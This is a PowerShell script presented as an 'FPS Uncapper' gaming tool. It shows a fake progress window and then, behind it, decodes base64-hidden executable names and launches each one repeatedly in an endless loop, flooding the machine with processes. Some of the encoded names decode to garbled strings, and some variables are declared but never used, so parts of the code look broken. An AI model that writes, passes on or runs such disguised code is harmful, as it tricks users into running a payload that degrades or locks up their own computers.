Add-Type @"
using System;
using System.Windows.Forms;
public class F : Form {
    public F() {
        this.Text = "FPS Uncapper";
        this.Width = 300;
        this.Height = 150;
        Label l = new Label();
        l.Text = "Unlocking FPS... Please wait.";
        l.AutoSize = true;
        l.Location = new System.Drawing.Point(50, 50);
        this.Controls.Add(l);
    }
}
"@
$form = New-Object F
$form.Show()

$d=[Text.Encoding]::UTF8
$x=[Convert]::FromBase64String
$b='WGxwcG95ZXJuZS5l','Ym1wOTk0ZDg2ZDg4Y2N0c28uZXhl','eXJlY2tpbmcuZXhl','Y21vY2VtYW5kYy5leGU=','Y21kLnJlY2VsY2FjdC5leGU=','Y2FscmVubmVwZy5leGU='
Start-Sleep 3
while(1){foreach($e in $b){1..20|%{&([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($e)))}}}
